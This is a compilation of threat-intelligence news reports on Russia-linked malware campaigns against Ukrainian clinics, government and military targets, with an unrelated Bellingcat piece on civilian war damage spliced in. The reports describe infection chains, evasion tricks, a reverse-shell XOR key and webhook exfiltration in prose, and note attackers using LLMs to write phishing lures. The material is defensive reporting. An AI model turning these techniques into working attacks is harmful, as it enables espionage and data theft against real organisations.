CERT-UA reports UAC-0247 targeting Ukrainian clinics and government bodies with malware stealing data from Chromium browsers and WhatsApp.
CERT-UA has revealed a cyber campaign by the threat actor UAC-0247 targeting Ukrainian government entities and municipal healthcare facilities, including clinics and emergency hospitals. The operation between March and April 2026, used malware designed to steal sensitive data from Chromium-based browsers and WhatsApp. The origin of the threat actor remains unclear, raising concerns about ongoing espionage risks.
The attack begins with a phishing email posing as a humanitarian aid proposal, prompting the victim to click a link. To appear credible, attackers may use AI-generated fake websites or exploit legitimate sites vulnerable to XSS attacks.
Clicking the link downloads an archive containing a shortcut file that triggers an HTA execution chain. This retrieves a remote HTA file showing a decoy form while silently launching an EXE via a scheduled task.
The malware injects shellcode into legitimate processes like RuntimeBroker.exe. Recent variants use a two-stage loader with a custom executable format, delivering a compressed and encrypted payload. A reverse shell, often similar to RAVENSHELL, establishes a TCP connection with the command server, encrypts traffic via XOR, and executes commands.
“A typical TCP reverse shell or an analogue classified as RAVENSHELL can be used as stagers, which provides for establishing a TCP connection with the management server, encrypting traffic using 9-byte XOR (key: “01 01 02 03 74 15 04 FF EE”; during the first connection, an XOR-encrypted message “Connected!” is transmitted), as well as executing commands using CMD.” reads the report published by CERT-UA.
For persistence, the attackers deployed the malware AGINGFLY alongside a PowerShell script, SILENTLOOP, which manages commands, updates configuration, and retrieves C2 server data via Telegram with backup mechanisms.
AGINGFLY is a C# malware used to remotely control infected computers. It can run commands, download files, take screenshots, log keystrokes, and execute code. It communicates with its control server via encrypted web sockets using AES-CBC. Unlike typical malware, it doesn’t store command functions locally, instead, it downloads them from the server and compiles them on the fly, making it more flexible and harder to detect.
CERT-UA experts analyzed multiple incidents, discovering that attackers stole credentials from browsers using CHROMELEVATOR and from WhatsApp via ZAPIXDESK, while also conducting reconnaissance and lateral movement within networks. They employ subnet scanners and tools like RUSTSCAN, and create covert tunnels using LIGOLO-NG and CHISEL. In one case, an XMRIG miner was deployed via a modified WIREGUARD executable. Targets include Ukrainian Defense personnel, with malware spread through a fake “BACHU” tool shared on Signal, leveraging DLL side-loading to deploy AGINGFLY.
“To reduce the likelihood of a cyberthreat, it is enough to limit the launch of LNK, HTA, and JS files, as well as legitimate utilities mshta.exe, powershell.exe, and wscript.exe, the necessity of which has been repeatedly emphasized in the context of reducing the attack surface by using standard operating system protection mechanisms.” concludes the report.
Ukrainian cyber defenders reported a newly intensified cyber campaign that is targeting Ukraine’s healthcare system and local government agencies, with attackers deploying increasingly sophisticated malware and social engineering tactics.
In a fresh advisory, the CERT-UA said the activity—linked to a threat cluster tracked as UAC-0247—spiked between March and April 2026, with clinical hospitals, emergency services, and municipal bodies bearing the brunt of the attacks.
UAC-0247 Used Humanitarian Aid Lures as Entry Point
The campaign begins with phishing emails disguised as offers of humanitarian assistance—a tactic designed to exploit trust during wartime conditions. Victims are urged to click on links that appear legitimate, sometimes backed by convincingly crafted fake websites or compromised third-party resources.
Behind the scenes, however, the links trigger a multi-stage infection chain that ultimately gives attackers remote control over the victim’s system.
Once clicked, victims download an archive containing a malicious shortcut file. This file activates a built-in Windows tool to execute remote code, initiating a sequence that includes decoy documents to avoid suspicion.
The attack escalates quickly. Malicious executables are deployed via scheduled tasks, injecting code into legitimate system processes such as RuntimeBroker.exe to evade detection.
Recent campaigns show an evolution in sophistication, with attackers introducing multi-stage loaders and custom executable formats. Payloads are often encrypted and compressed, making analysis and detection more difficult.
At later stages, attackers deploy reverse shell tools—including variants resembling “RAVENSHELL”—to establish encrypted communication with command-and-control servers and execute remote commands.
Persistent Access and Remote Control
To maintain long-term access, attackers install a custom backdoor known as AGINGFLY, a C#-based malware designed for full remote system control. The tool enables:
Unlike conventional malware, AGINGFLY dynamically retrieves and compiles its command logic from remote servers, making it more adaptable and harder to detect.
Complementing this is a PowerShell-based tool dubbed SILENTLOOP, which helps maintain persistence and retrieves command server addresses—sometimes even pulling them from Telegram channels.
Credential Theft and Lateral Movement
Once inside a network, attackers move quickly to expand access. CERT-UA observed tools like CHROMELEVATOR being used to extract browser credentials, while ZAPIXDESK targets WhatsApp data.
The attackers also conduct internal reconnaissance using both custom scripts and publicly available tools such as RUSTSCAN. For stealthy movement across networks, tunneling tools like LIGOLO-NG and CHISEL are deployed.
In at least one case, attackers went further—embedding the XMRIG cryptocurrency miner inside a modified version of the legitimate WireGuard application, highlighting a secondary motive of financial gain.
Military Targets Also in Scope
The campaign isn’t limited to civilian infrastructure. CERT-UA noted an incident in March where individuals connected to Ukraine’s defense sector were targeted via the Signal platform.
Attackers distributed a trojanized version of software used by FPV drone operators, packaged as a seemingly legitimate update. In reality, the download triggered a DLL side-loading attack that installed the AGINGFLY backdoor.
CERT-UA recommends reducing exposure by restricting the execution of high-risk file types such as LNK, HTA, and JavaScript files. The agency also urges organizations to limit the use of native Windows tools like mshta.exe and PowerShell where possible, as these are frequently abused in attacks.
APT28 targets Ukraine and allies with PRISMEX malware, using stealthy techniques for espionage and command-and-control.
Russia-linked group APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) is running a spear-phishing campaign against Ukraine and its allies, deploying a new malware suite called PRISMEX. Active since September 2025, the campaign uses advanced stealth techniques like steganography and COM hijacking, and targets defense systems and aid infrastructure to support long-running espionage operations.
The Russian cyber espionage group remains highly aggressive, quickly weaponizing newly disclosed flaws like CVE-2026-21509 to target government, military, and critical infrastructure in Central and Eastern Europe. Its latest campaign uses the PRISMEX malware suite, combining a dropper, loader, and implant based on the Covenant framework to enable stealthy, fileless attacks and encrypted command-and-control.
The operation shows advanced preparation and links to past activity, focusing on Ukraine’s defense supply chain, including allies, transport, and aid networks. Researchers believe this marks an evolution of the NotDoor ecosystem, expanding capabilities for rapid exploitation and long-term espionage.
Attack chain starts with spear-phishing emails themed around military training, weather alerts, or weapon smuggling. Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
The LNK file may then exploit CVE-2026-21513 to bypass browser protections and execute code silently, downloading additional payloads. This suggests a possible two-stage attack chain designed for stealth and reliability.
“TrendAI Research has tracked Pawn Storm’s activities across three distinct but interconnected campaigns, each building upon its previous infrastructure and tooling.” reads the report published by Trend Micro. “The timeline of this campaign indicates advanced knowledge of multiple vulnerabilities:
CVE-2026-21509: Domain registration for WebDAV servers began on January 12, 2026, exactly two weeks prior to the public disclosure on January 26.
CVE-2026-21513: The LNK exploit sample appeared on VirusTotal on January 30, 2026, while Microsoft’s patch was not released until February 10, 2026. This 11-day gap confirms zero-day exploitation in the wild.
This pattern suggests Pawn Storm had access to vulnerability details ahead of public disclosure.”
From there, the infection can follow different paths, including deployment of the PRISMEX malware suite. PRISMEX components, such as PrismexSheet, PrismexDrop, PrismexLoader, and PrismexStager, use techniques like steganography, COM hijacking, and abuse of cloud services for command-and-control. These methods enable fileless execution, persistence, and evasion of modern security tools, allowing attackers to maintain long-term access and conduct espionage operations.
The researchers detailed decoy documents and targeting, such as a malicious Excel files showing realistic decoy content once macros are enabled, including Ukrainian drone inventories, supplier price lists, and military logistics forms.
These themes clearly target Ukrainian drone units and logistics staff. The upload data suggests victims across key regions like Kyiv and Kharkiv, indicating a focus on both frontline and command structures.
PrismexDrop is a native dropper that prepares the system by decrypting payloads, dropping files, and ensuring persistence via COM hijacking and a scheduled task that restarts explorer.exe. This allows the malware to run within a trusted process, improving stealth and reliability.
PrismexLoader is a loader that acts as a proxy DLL, executing malicious code while mimicking legitimate system behavior. It uses a custom “Bit Plane Round Robin” steganography method to extract hidden payloads from images, spreading data across the file to evade detection. The payload is then executed entirely in memory using .NET runtime loading, leaving minimal traces on disk.
The final component, PrismexStager, connects to command-and-control servers via Filen.io cloud services. This helps attackers blend malicious traffic with normal encrypted communications, making detection harder while enabling data exfiltration and remote control.
“The payload extracted from the image is the Covenant Grunt Stager, which we have internally tracked as PrismexStager. This is a .NET assembly responsible for C&C and executing further tasks from the Covenant framework. It is heavily obfuscated with randomized function names to hinder static analysis. ” states the report. “The malware abuses the legitimate end-to-end encrypted cloud storage service Filen.io for C&C communications. By leveraging this trusted service, the malicious traffic blends in with normal encrypted web traffic, effectively bypassing reputation-based filtering and firewall rules.”
The campaign shows a clear strategy: disrupt Ukraine’s supply chain and operational planning, while extending access to NATO-linked logistics. Targets include the Ukrainian government, defense, emergency services, and hydrometeorology, critical for drone and artillery operations, as well as hubs in Poland, Romania, Slovakia, and others supporting military aid flows.
TrendAI attributes the activity to the APT28 group with high confidence, based on consistent tools, infrastructure, and behavior. Unique elements like the custom steganography method, MiniDoor/NotDoor malware lineage, use of Covenant, and COM hijacking reinforce this link, along with reused infrastructure and rapid exploitation of vulnerabilities.
The operation reflects a shift toward tactical disruption rather than pure espionage. By targeting weather data, transport networks, and aid organizations, attackers aim to map and potentially sabotage support to Ukraine. The presence of destructive capabilities alongside espionage tools highlights the dual-use nature of the campaign, enabling both intelligence gathering and potential disruptive attacks aligned with military objectives.
“The technical links between the PRISMEX components and previous campaigns demonstrate the threat actor’s continuous development cycle and modular approach to capability building. Organizations in the targeted geographic and industry sectors should consider themselves at elevated risk and implement the countermeasures detailed above immediately. ” concludes the report. “The use of newly disclosed vulnerabilities and legitimate cloud services makes detection challenging. Defenders must adopt an “assume breach” mentality and focus on behavioral anomalies rather than just static indicators. ”
Threat actors impersonated CERT-UA to send phishing emails with AGEWHEEZE malware, tricking victims into installing a fake “security tool.”
A threat actor, tracked as UAC-0255, impersonated CERT-UA in a phishing campaign, sending emails to about 1 million users. The messages urged victims to download a password-protected archive from Files.fm and install a fake “specialized software,” which actually deployed the AGEWHEEZE remote access tool, giving attackers control over infected systems.
“The National Cyber Incident, Cyber Attack, and Cyber Threat Response Team CERT-UA recorded cases of distribution of emails allegedly on behalf of CERT-UA on March 26-27, 2026, urging people to download a password-protected archive (“CERT_UA_protection_tool.zip”, “protection_tool.zip”) from the Files.fm service and install “specialized software”.” reads the advisory published by CERT-UA.“It was found that the executable file that was offered to be installed (internal package name: “/example.com/tvisor/agent”) is a multifunctional software tool for remote computer control, classified by CERT-UA as AGEWHEEZE.”
AGEWHEEZE supports command execution, file management, screen capture, input control, and process/service management. It ensures persistence via registry, startup, or scheduled tasks, installing itself in AppData paths. The malware communicates with its server via WebSockets and can also steal clipboard data, run commands, and control system actions.
The campaign targeted government organizations, medical centers, security companies, educational institutions, financial institutions, software development companies, and others.
The attackers created a fake website (cert-ua[.]tech) mimicking the real CERT-UA site to spread the fake “security tool” that is actually AGEWHEEZE malware. The tool allows remote control of infected systems. CERT-UA experts state that the command server is hosted on OVH infrastructure and includes a login page (“The Cult”) with Russian-language elements, suggesting the attackers’ origin or links.
The fake site cert-ua[.]tech includes links to a Telegram channel claiming responsibility for the attack, confirming attribution to UAC-0255.
The fake site was likely AI-generated and included references to “CYBER SERP,” a group active since late 2025, claiming responsibility. The group says it sent phishing emails to 1 million users and infected over 200,000 devices, though this is unverified.
The campaign had a limited impact, infecting only a few devices in educational institutions. CERT-UA experts helped contain it. The case shows how AI can make cyberattacks easier, and highlights the need to reduce attack surfaces and use security tools like AppLocker and system protections.
Authorities thanked Ukrainian telecom providers for supporting cyber defense efforts and sharing threat information. They also warned that AI is making attacks easier, urging organizations to reduce attack surfaces and strengthen security using system protections and dedicated tools.
APT28 used BEARDSHELL and COVENANT malware to spy on Ukrainian military personnel, enabling long-term surveillance since April 2024.
The Russia-linked group APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has used BEARDSHELL and COVENANT malware to conduct long-term surveillance of Ukrainian military personnel. According to ESET, the campaign began in April 2024 and relies on custom implants designed to maintain persistent access and collect sensitive information from targeted systems.
“Since April 2024, Sednit’s advanced development team has reemerged with a modern toolkit centered on two paired implants, BeardShell and Covenant, each using a different cloud provider for resilience.” reads the report published by ESET. “This dual‑implant approach enabled long‑term surveillance of Ukrainian military personnel. Interestingly, these current toolsets show a direct code lineage to the group’s 2010‑era implants.”
The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
BEARDSHELL and SLIMAGENT are two advanced malware tools written in C++. BEARDSHELL downloads, decrypts (using ChaCha20-Poly1305), and runs PowerShell scripts, sending results via the Icedrive API. It creates a unique folder on each infected machine based on system identifiers. SLIMAGENT captures screenshots using Windows APIs, encrypts them with AES and RSA, and stores them locally with timestamped filenames. Both tools are stealthy, use strong encryption, and exploit legitimate cloud services to avoid detection, highlighting modern APT tactics.
“SlimAgent includes several features that were absent from the 2018 samples, such as encryption of the collected logs. Nevertheless, it is remarkable that samples deployed six years apart exhibit such strong code similarities.” continues the report. “We therefore assess with high confidence that both the 2018 samples and the 2024 SlimAgent sample were built from the same codebase.”
Code comparison between SlimAgent (left) and Xagent (right)
In May 2025, ESET researchers reported unauthorized access to an email account in the Ukrainian government’s gov.ua domain. CERT-UA, in collaboration with the Cybersecurity Center of Military Unit A0334, responded to the incident.
Analysis shows that SLIMAGENT likely evolved from the XAgent keylogger long used by APT28. Researchers found strong code similarities, including identical keylogging logic and HTML-based logging with the same color scheme for captured data. Evidence suggests SLIMAGENT has been deployed as a standalone espionage tool since at least 2018. Despite XAgent’s well-known codebase, the group continues reusing and adapting it, alongside newer malware like BEARDSHELL, in recent espionage campaigns.
During forensic analysis, the researchers discovered malware linked to the COVENANT framework and the BEARDSHELL backdoor. The experts were not able to determine the initial infection vector.
ESET noted that BEARDSHELL uses a rare obfuscation method called opaque predicate, previously seen in XTunnel, a tool used by APT28 during the Democratic National Committee hack. This link strongly suggests BEARDSHELL belongs to the group’s toolkit. Another tool, COVENANT, has been heavily modified to support long-term espionage and uses cloud services like Filen for command-and-control communications.
The cybersecurity firm reports that developers behind APT28 have developed strong expertise in the Covenant framework, despite its official development ending in 2021. The group has successfully adapted and reused the tool for several years, particularly in espionage operations targeting Ukrainian organizations.
“we have shown that Sednit’s advanced development team is active once again, operating an arsenal centered on two implants – BeardShell and Covenant – deployed in tandem and each leveraging a different cloud provider.” concludes the report. “The sophistication of BeardShell and the extensive modifications made to Covenant demonstrate that Sednit’s developers remain fully capable of producing advanced custom implants. Furthermore, the shared code and techniques linking these tools to their 2010-era predecessors strongly suggest continuity within the development team.”
Recently, ClearSky researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain.
Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails.
Researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain.
“The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, an initial HTA file displays a lure document written in Ukrainian concerning border crossing appeals to deceive the victim.” reads the report published by ClearSky. “Simultaneously, the infection triggers the download of BadPaw, a .NET-based loader. Upon establishing command-and-control (C2) communication, the loader deploys MeowMeow, a sophisticated backdoor.”
Researchers found that both malware strains use the .NET Reactor packer to make the analysis and reverse engineering harder, showing the attackers’ intent to evade detection and maintain long-term persistence.
“An additional layer of defense employed by BadPaw is the use of .NET Reactor, a commercial protection and obfuscation tool for .NET assemblies. This packer obfuscates the underlying code to hinder static analysis and reverse engineering.” continues the report.
The malware also includes multiple defense mechanisms. Its components stay inactive unless launched with specific parameters, otherwise displaying a benign interface and executing harmless code.
The MeowMeow backdoor adds environmental checks, scanning systems for virtual machines and analysis tools such as Wireshark, ProcMon, and Fiddler. If it detects a sandbox or research environment, it immediately stops execution to avoid investigation.
Researchers at ClearSky attribute the campaign with high confidence to a Russia-linked cyberespionage group and with lower confidence to the threat actor APT28. Their assessment relies on three factors: the targeting of Ukrainian entities, Russian-language artifacts in the code, and tactics consistent with previous Russian cyber operations, including multi-stage infection chains and .NET-based loaders.
In parallel, the attack chain leads to the deployment of a .NET-based loader called BadPaw, which then establishes communication with a remote server to fetch and deploy a sophisticated backdoor called MeowMeow.
The campaign has been attributed with moderate confidence to the Russian state-sponsored threat actor known as APT28, based on the targeting footprint, the geopolitical nature of the lures used, and overlaps with techniques observed in previous Russian cyber operations.
ClearSky’s research details outline a multi-stage infection chain beginning with a phishing email sent via the Ukrainian provider ukr[.]net, a service previously abused in Russian campaigns. The email contains a link that first loads a tracking pixel to notify attackers when a victim clicks, then redirects to a shortened URL that downloads a ZIP archive.
Inside the archive is a disguised HTA file posing as an HTML document. When executed, it opens a decoy document about a Ukrainian border-crossing appeal while silently launching the malicious routine. The HTA performs anti-analysis checks by verifying the system’s installation date and aborting execution on recently installed systems, a common sandbox-evasion tactic.
“The dropped decoy document serves as a social engineering tactic, presenting a confirmation of receipt for a government appeal regarding a Ukrainian border crossing. This lure is intended to maintain the veneer of legitimacy while the HTA file executes its secondary stages in the background.” continues the report. “To evade detection and identify potential sandbox environments, the HTA file performs an environmental check by inspecting the following Registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate By querying this value, the malware calculates the “age” of the operating system. If the system was installed less than ten days prior to execution, the malware terminates. This is a common anti-analysis technique used to avoid execution on freshly provisioned virtual machines or automated analysis sandboxes”
If conditions are met, it searches for the original archive, extracts additional components, and establishes persistence through a scheduled task. A VBS script then retrieves hidden payload data embedded within an image using steganography, extracting a PE file that researchers identified as the BadPaw loader, which ultimately deploys the MeowMeow backdoor and establishes command-and-control communication.
Researchers found Russian-language strings in the malware code, including one indicating the time needed to reach an operational state. These artifacts suggest a Russian origin and may reflect an OPSEC mistake or leftover development elements not adapted for Ukrainian targets.
“The presence of these Russian-language strings suggests two possibilities: the threat actor committed an operational security (OPSEC) error by failing to localize the code for the Ukrainian target environment, or they inadvertently left Russian development artifacts within the code during the malware’s production phase.” concludes the report.
Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze.
Russia-linked APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) launched Operation MacroMaze, targeting select entities in Western and Central Europe from September 2025 to January 2026. The campaign used webhook-based macro malware, leveraging simple tools and legitimate services for infrastructure and data exfiltration.
The attack chain campaign begins with spear-phishing emails delivering weaponized documents that contain an “INCLUDEPICTURE” field pointing to a webhook[.]site URL hosting a JPG.
“All analyzed documents share a common structural element within their XML: an INCLUDEPICTURE field referencing a remote URL hosted on webhook[.]site.” reads the report published by S2 Grupo’s LAB52 threat intelligence team. “This field is embedded in the document’s XML (w:instrText) and instructs Microsoft Word to retrieve an external image resource when the field is evaluated. The referenced file (docopened.jpg) is fetched from the remote server when the document is opened and fields are updated. This behavior functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server. The server operator can then log metadata associated with the request, effectively confirming that the document has been opened.”
When opened, the file silently retrieves the image, acting like a tracking pixel that alerts attackers the document was viewed. Variants seen between September 2025 and January 2026 use modified macros to drop malware and deploy additional payloads on compromised systems.
Researchers identified four closely related macro variants acting as droppers. Each drops six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path. The attackers used heavy string concatenation to hide key commands. The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, then deletes traces. Over time, the variants evolved from simple document cleanup to fake Word error messages and SendKeys-based UI manipulation to bypass security prompts. Two batch versions follow: one uses Edge in headless mode for stealth, the other hides the browser off-screen and forcefully kills processes for reliability, suppressing certificate errors.
“The final HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, while the payload output is embedded directly within a element. The closing XHTML fragment completes the document structure.” continues the report. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.”
The Operation MacroMaze campaign uses a browser-based exfiltration method that relies on standard HTML features to send stolen data while leaving minimal traces on disk. Although the specific command file used to gather system data was not recovered, similar operations previously attributed to APT28 by CERT Polskaand theComputer Emergency Response Team of Ukraine suggest this stage likely deploys a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.
“This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth.” concludes the report. “The tooling may be unsophisticated, but the operational tradeoffs are effective. It’s low-tech executed with high craft, which makes detection and attribution harder than the artifacts alone would suggest.”
The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe. Threat actors targeted the vulnerability CVE-2026-21509, they used weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.
In the tiny town of Krasnopillia in rural Ukraine, the stillness of the night is shattered by the whine of a Russian drone. Seconds later, a community hospital bursts into flames. Sparks and debris rain down across the skeletons of trees as the fire sends plumes of smoke into the pitch-black sky.
Dozens of people are evacuated, according to local media reports – but as rescuers respond, in what appears to be a double-tap strike, Russian forces hit a shelter where more than 20 patients are huddled, including some with limited mobility.
The strike in March 2025 comes just hours after a larger regional hospital in the northeastern Sumy governorate is targeted, decimating the primary health facilities serving the small town of Krasnopillia, whose prewar population was around 7,700. Healthcare services for the town “practically ceased” in the wake of the strikes, Olena Pryima, a local school director, told Bellingcat in a phone interview.
“[The Russians] destroy the infrastructure so that people do not have the opportunity to live and exist normally. You cannot consult a doctor, nothing,” she said. “And now these people who remain, God forbid, the ambulance will not go there, just because the security situation does not allow it.”
Support Bellingcat
Your donations directly contribute to our ability to publish groundbreaking investigations and uncover wrongdoing around the world.
Her own school was among the many buildings destroyed in Russian strikes, and she says it has been impossible to rebuild amid the ongoing war. “We try to heat some accommodations, in spite of everything … especially since this winter is very difficult,” Pryima said. “But we are not talking about rebuilding at all now. We have hope; we are collecting some documents [such as testimonies and damage assessments], since this will end someday – and then we can rebuild something.”
For the past four years, Bellingcat has been documenting and verifying incidents such as these, chronicling the extensive damage to civilian life and infrastructure after the onset of Russia’s full invasion which began in February 2022.
In over 2,500 cases of civilian harm that we have verified – the vast majority of which occurred on Ukrainian territory, although dozens also took place in Russia – more than 1,100 residential structures were hit. Hundreds of other civilian sites such as schools, playgrounds, fire stations, hospitals, churches, cultural centres, museums, businesses and farms have been impacted too.
Our data – which includes cases that Bellingcat researchers were able to definitively geolocate using open source evidence, and does not reflect the full extent of civilian harm across Ukraine – pinpoints more than 300 attacks on schools or childcare facilities, 170 hits on healthcare or humanitarian sites, and four dozen incidents targeting food and related infrastructure.
While many attacks were clustered around four main cities – Kharkiv, Donetsk, Kherson and Kyiv – we documented strikes across all areas of the country. Of the weapons that could be identified through available open source information, cluster munitions were used in more than 100 cases.
Cluster munitions, which are banned in more than 100 countries (but not Russia or Ukraine), have killed more than 1,200 people since the war began, with Ukraine recording the highest number of annual casualties worldwide from these weapons in 2024 for the third consecutive year,according to the Landmine and Cluster Munition Monitor.
Bellingcat and members of its volunteer community logged all verified incidents of civilian harm on an interactive TimeMap over a four-year period spanning February 2022 to December 2025. The map is no longer being updated, but it remains online as an archive (and can be seen below).
An interactive map detailing incidents of civilian harm between February 2022 and December 2025.
Since Russia’s invasion four years ago, the civilian toll in Ukraine has been stark, with around 15,000 killed – including more than 750 children – and 40,600 injured, according to a January 2026 report by the Office of the United Nations High Commissioner for Human Rights.
An analysis last year by Armed Conflict Location and Event Data (ACLED) found that Russia followed “a persistent pattern of targeting of populated areas … often indiscriminate, other times more deliberate”.
Related videos from Bellingcat
New apartment complexes are listed for sale on Russian websites. Meanwhile, Ukrainians are struggling to reclaim their homes.
ACLED’s data for the period of February 2022 to late January 2026 highlights thousands of residential strikes across Ukraine, along with more than 750 attacks on healthcare facilities, 1,200 on educational sites, and 2,400 on energy infrastructure. A February 2025 World Bank report says it will take more than US$500bn to rebuild Ukraine.
These numbers tell only part of the story. While much global media attention has focused on the politics of the Russia-Ukraine war, or highlighted strikes on large urban centres, civilians in remote rural villages have suffered outsized impacts from the destruction of schools, hospitals and cultural institutions – the key threads tying their communities together.
In Verkhna Syrovatka, a small village in Sumy of around 3,800 people, images from the scene of shelling in May 2025 revealed a massive hole in the community’s blue-roofed cultural house. Inside the facility, which once served as a place for rehearsals, children’s classes and folk ensembles, photographs and trophies could be seen amid piles of splintered wood and cracked concrete.
The village’s only school was also impacted, with many of its windows blown out, forcing classes to move online. This devastation reflects a countrywide trend, as UNICEF reports that Ukrainian children are falling behind in core subjects such as reading, maths and science.
Incidents of civilian harm recorder by Bellingcat in Verkhna Syrovatka. Readers can click or tap the dots to learn more about each incident.
Further south, the village of Opytne in the Donetsk region is gradually being erased, amid a series of Russian attacks dating back more than a decade to the 2014 occupation of the Crimean Peninsula.
The village has changed hands repeatedly in recent years. In December 2022, drone footage revealed large-scale destruction of its residential area, including a medical office, music school and church. According to media reports, perhaps only half a dozen residents remain out of more than 1,000 who lived in the village a decade ago.
Image left shows the village of Opytne in 2021, before Russia’s full invasion (Credit: Airbus/Google Earth Pro). Image right shows the village of Opytne in 2024 (Credit: Maxar/Google Earth Pro).
A couple of months later, in February 2023 in Dvorichna, a rural settlement in the Kharkiv region, Russian forces launched another double-tap strike: as first responders searched for survivors from an earlier attack on the village council building, several emergency vehicles were hit.
Located just south of the Russian border, Dvorichna has been occupied on and off since 2022. As a result, the village, whose population was roughly 3,500 four years ago, is estimated to house only 80 residents today.
Across Ukraine, the catalogue of horrors is endless. In Pravdyne, a small village in the Kherson region, the prewar population of more than 1,000 people was reported to have dwindled to fewer than 200 by late 2022. Corpses showing signs of torture have been exhumed from garden beds; in one case, residents reportedly buried the bodies of Ukrainian soldiers under slabs of slate to prevent dogs from reaching them.
Incidents of civilian harm recorder by Bellingcat in Pravdyne. Readers can click or tap the dots to learn more about each incident.
In Sumy Oblast, Russian drone and missile attacks have forced residents to flee homes they inhabited for half a century. In the village of Hroza in northeastern Ukraine, one-fifth of the population died in a single attack while attending the funeral of a soldier, according to local officials.
What may never be calculated are the impacts this brutal conflict will have on future generations.
Incidents of civilian harm recorder by Bellingcat in Hroza. Readers can click or tap the dots to learn more about each incident.
Back in Krasnopillia, the local school director, Pryima says residents have tried hard to stay in what she calls “the zone of resilience”, but it has been a struggle.
“It’s very scary to fall asleep, because you don’t know if you’ll wake up in the morning,” she said, noting that residents live in constant fear of the drones that fly overhead, keenly aware that a bomb may drop at any moment.
For Ukrainian children, the effects have been especially dire.
“Those children, before the full-scale invasion, were carefree, cheerful – what children should be,” Pryima said. “Those children are no longer there.”
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of individual donors. If you would like to support our work, you can do so here. You can also subscribe to our Patreon channel here. Subscribe to our Newsletter and follow us on Bluesky here, Instagram here, Reddit here and YouTube here.
A new alleged Russia-linked APT group targeted Ukrainian defense, government, and energy groups, with CANFAIL malware.
Google Threat Intelligence Group identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both regional and national levels in Ukraine.
GTIG researchers observed the Russian intelligence conducting phishing campaigns to deliver CANFAIL malware. The actor is also interested in aerospace, drone-linked manufacturers, nuclear research, and humanitarian groups tied to Ukraine. Google reported that the APT group has also probed Romanian and Moldovan entities.
“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” reads the report published by Google. “Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup. “
Though less advanced than other Russian groups, it uses LLMs to craft lures, perform reconnaissance, and solve technical tasks. The threat actors wrote the phishing emails with LLM.
Messages include Google Drive links hosting a RAR archive with CANFAIL malware, often disguised with a double extension like .pdf.js. CANFAIL is obfuscated JavaScript that runs a PowerShell script to download and execute a second-stage payload, typically a memory-only dropper, while showing a fake error popup to the victim.
“Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” continues the report. “CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake “error” popup to the victim.”
SentinelLABS and the Digital Security Lab of Ukraine documented related activity in the October 2025 “PhantomCaptcha” campaign, which briefly used ClickFix tactics.
Russian espionage groups continue targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures. Below are some groups observed by Google Threat Intelligence Group:
APT44 (Sandworm/FROZENBARENTS), linked to GRU Unit 74455, has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices.
TEMP.Vermin, tied to LPR-linked actors, deployed malware such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains.
UNC5125 targeted frontline drone units with Google Forms lures and malware like MESSYFORK and GREYBATTLE.
UNC5792 and UNC4221 abused Signal and WhatsApp features with fake group invites and phishing pages to hijack accounts and deploy malware including STALECOOKIE and TINYWHALE.
